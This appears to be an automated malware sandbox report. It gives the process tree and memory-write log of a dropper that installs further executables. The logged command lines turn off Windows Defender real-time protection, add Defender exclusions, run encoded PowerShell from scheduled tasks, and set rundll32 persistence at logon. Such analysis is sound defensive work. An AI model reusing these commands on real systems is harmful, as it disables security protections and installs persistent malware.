description pid Process procid_target PID 704 wrote to memory of 1724 704 file.exe 27 PID 704 wrote to memory of 1724 704 file.exe 27 PID 704 wrote to memory of 1724 704 file.exe 27 PID 704 wrote to memory of 1724 704 file.exe 27 PID 704 wrote to memory of 1724 704 file.exe 27 PID 704 wrote to memory of 1724 704 file.exe 27 PID 704 wrote to memory of 1724 704 file.exe 27 PID 1724 wrote to memory of 2012 1724 Install.exe 28 PID 1724 wrote to memory of 2012 1724 Install.exe 28 PID 1724 wrote to memory of 2012 1724 Install.exe 28 PID 1724 wrote to memory of 2012 1724 Install.exe 28 PID 1724 wrote to memory of 2012 1724 Install.exe 28 PID 1724 wrote to memory of 2012 1724 Install.exe 28 PID 1724 wrote to memory of 2012 1724 Install.exe 28 PID 2012 wrote to memory of 1756 2012 Install.exe 30 PID 2012 wrote to memory of 1756 2012 Install.exe 30 PID 2012 wrote to memory of 1756 2012 Install.exe 30 PID 2012 wrote to memory of 1756 2012 Install.exe 30 PID 2012 wrote to memory of 1756 2012 Install.exe 30 PID 2012 wrote to memory of 1756 2012 Install.exe 30 PID 2012 wrote to memory of 1756 2012 Install.exe 30 PID 2012 wrote to memory of 1752 2012 Install.exe 31 PID 2012 wrote to memory of 1752 2012 Install.exe 31 PID 2012 wrote to memory of 1752 2012 Install.exe 31 PID 2012 wrote to memory of 1752 2012 Install.exe 31 PID 2012 wrote to memory of 1752 2012 Install.exe 31 PID 2012 wrote to memory of 1752 2012 Install.exe 31 PID 2012 wrote to memory of 1752 2012 Install.exe 31 PID 1756 wrote to memory of 1808 1756 forfiles.exe 33 PID 1756 wrote to memory of 1808 1756 forfiles.exe 33 PID 1756 wrote to memory of 1808 1756 forfiles.exe 33 PID 1756 wrote to memory of 1808 1756 forfiles.exe 33 PID 1756 wrote to memory of 1808 1756 forfiles.exe 33 PID 1756 wrote to memory of 1808 1756 forfiles.exe 33 PID 1756 wrote to memory of 1808 1756 forfiles.exe 33 PID 1752 wrote to memory of 1352 1752 forfiles.exe 35 PID 1752 wrote to memory of 1352 1752 forfiles.exe 35 PID 1752 wrote to memory of 1352 1752 forfiles.exe 35 PID 1752 wrote to memory of 1352 1752 forfiles.exe 35 PID 1752 wrote to memory of 1352 1752 forfiles.exe 35 PID 1752 wrote to memory of 1352 1752 forfiles.exe 35 PID 1752 wrote to memory of 1352 1752 forfiles.exe 35 PID 1352 wrote to memory of 1700 1352 cmd.exe 39 PID 1352 wrote to memory of 1700 1352 cmd.exe 39 PID 1352 wrote to memory of 1700 1352 cmd.exe 39 PID 1352 wrote to memory of 1700 1352 cmd.exe 39 PID 1352 wrote to memory of 1700 1352 cmd.exe 39 PID 1352 wrote to memory of 1700 1352 cmd.exe 39 PID 1352 wrote to memory of 1700 1352 cmd.exe 39 PID 1808 wrote to memory of 552 1808 cmd.exe 36 PID 1808 wrote to memory of 552 1808 cmd.exe 36 PID 1808 wrote to memory of 552 1808 cmd.exe 36 PID 1808 wrote to memory of 552 1808 cmd.exe 36 PID 1808 wrote to memory of 552 1808 cmd.exe 36 PID 1808 wrote to memory of 552 1808 cmd.exe 36 PID 1808 wrote to memory of 552 1808 cmd.exe 36 PID 1808 wrote to memory of 1040 1808 cmd.exe 38 PID 1808 wrote to memory of 1040 1808 cmd.exe 38 PID 1808 wrote to memory of 1040 1808 cmd.exe 38 PID 1808 wrote to memory of 1040 1808 cmd.exe 38 PID 1808 wrote to memory of 1040 1808 cmd.exe 38 PID 1808 wrote to memory of 1040 1808 cmd.exe 38 PID 1808 wrote to memory of 1040 1808 cmd.exe 38 PID 1352 wrote to memory of 1784 1352 cmd.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:704 -
C:\Users\Admin\AppData\Local\Temp\7zS926.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Users\Admin\AppData\Local\Temp\7zSD0C.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1808 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:552
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1040
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1352 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1784
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1700
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gmZMrGyIL" /SC once /ST 06:15:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1656
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gmZMrGyIL"4⤵PID:1964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gmZMrGyIL"4⤵PID:632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bKcODTUCyUvoWvuOBb" /SC once /ST 12:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR\KPaUieawoGhgiPB\uQofUYb.exe\" ra /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1136
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F6FFDA71-B4B7-4E84-A2BD-C0913BA2063F} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]1⤵PID:1992
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1268 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:600
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1444 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1948
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1820
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1756 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1752
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:980
-
C:\Windows\system32\taskeng.exetaskeng.exe {3CB6575B-1EFF-43E1-A864-1376A48CA867} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1700
-
C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR\KPaUieawoGhgiPB\uQofUYb.exeC:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR\KPaUieawoGhgiPB\uQofUYb.exe ra /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1784 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJBehPVni" /SC once /ST 09:42:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gJBehPVni"3⤵PID:1540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJBehPVni"3⤵PID:936
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1328
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:472
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1636
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1340
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gGjkXtWkI" /SC once /ST 07:22:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gGjkXtWkI"3⤵PID:1488
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gGjkXtWkI"3⤵PID:1964
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EpsxxpNsmYaigCcr" /t REG_DWORD /d 0 /reg:323⤵PID:584
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EpsxxpNsmYaigCcr" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EpsxxpNsmYaigCcr" /t REG_DWORD /d 0 /reg:643⤵PID:780
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EpsxxpNsmYaigCcr" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1868
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EpsxxpNsmYaigCcr" /t REG_DWORD /d 0 /reg:323⤵PID:980
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EpsxxpNsmYaigCcr" /t REG_DWORD /d 0 /reg:324⤵PID:936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EpsxxpNsmYaigCcr" /t REG_DWORD /d 0 /reg:643⤵PID:1588
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EpsxxpNsmYaigCcr" /t REG_DWORD /d 0 /reg:644⤵PID:1292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\EpsxxpNsmYaigCcr\FMnDiwXy\faASpsyopMKaQBUr.wsf"3⤵PID:1732
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\EpsxxpNsmYaigCcr\FMnDiwXy\faASpsyopMKaQBUr.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1304 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyLrXeBYgDUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyLrXeBYgDUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KlxBVdQvPHUU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KlxBVdQvPHUU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prTKcPnPU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prTKcPnPU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1384
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wfePzGzbIQGEC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wfePzGzbIQGEC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\kLiGIkXWiwtEPvVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\kLiGIkXWiwtEPvVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EpsxxpNsmYaigCcr" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EpsxxpNsmYaigCcr" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyLrXeBYgDUn" /t REG_DWORD /d 0 /reg:324⤵PID:424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyLrXeBYgDUn" /t REG_DWORD /d 0 /reg:644⤵PID:932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KlxBVdQvPHUU2" /t REG_DWORD /d 0 /reg:324⤵PID:1288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KlxBVdQvPHUU2" /t REG_DWORD /d 0 /reg:644⤵PID:1940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR" /t REG_DWORD /d 0 /reg:324⤵PID:1316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR" /t REG_DWORD /d 0 /reg:644⤵PID:1760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prTKcPnPU" /t REG_DWORD /d 0 /reg:324⤵PID:960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prTKcPnPU" /t REG_DWORD /d 0 /reg:644⤵PID:964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wfePzGzbIQGEC" /t REG_DWORD /d 0 /reg:324⤵PID:1744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wfePzGzbIQGEC" /t REG_DWORD /d 0 /reg:644⤵PID:676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\kLiGIkXWiwtEPvVB" /t REG_DWORD /d 0 /reg:324⤵PID:832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\kLiGIkXWiwtEPvVB" /t REG_DWORD /d 0 /reg:644⤵PID:1812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR" /t REG_DWORD /d 0 /reg:324⤵PID:1372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR" /t REG_DWORD /d 0 /reg:644⤵PID:1492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EpsxxpNsmYaigCcr" /t REG_DWORD /d 0 /reg:324⤵PID:1996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EpsxxpNsmYaigCcr" /t REG_DWORD /d 0 /reg:644⤵PID:1732
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRtzyXJKY" /SC once /ST 07:36:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRtzyXJKY"3⤵PID:1452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRtzyXJKY"3⤵PID:960
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1964
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:676
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1204
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zZBlWYGpCEMqhJzIS" /SC once /ST 09:00:02 /RU "SYSTEM" /TR "\"C:\Windows\Temp\EpsxxpNsmYaigCcr\mUVNwcRkaBVfmgi\vOsWNzL.exe\" E7 /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1152
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "zZBlWYGpCEMqhJzIS"3⤵PID:1880
-
-
-
C:\Windows\Temp\EpsxxpNsmYaigCcr\mUVNwcRkaBVfmgi\vOsWNzL.exeC:\Windows\Temp\EpsxxpNsmYaigCcr\mUVNwcRkaBVfmgi\vOsWNzL.exe E7 /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:832 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bKcODTUCyUvoWvuOBb"3⤵PID:1684
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:848
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:600
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1996
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1732
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\prTKcPnPU\ujMVAT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SOnJrQRHBOIzCQS" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:956
-
-
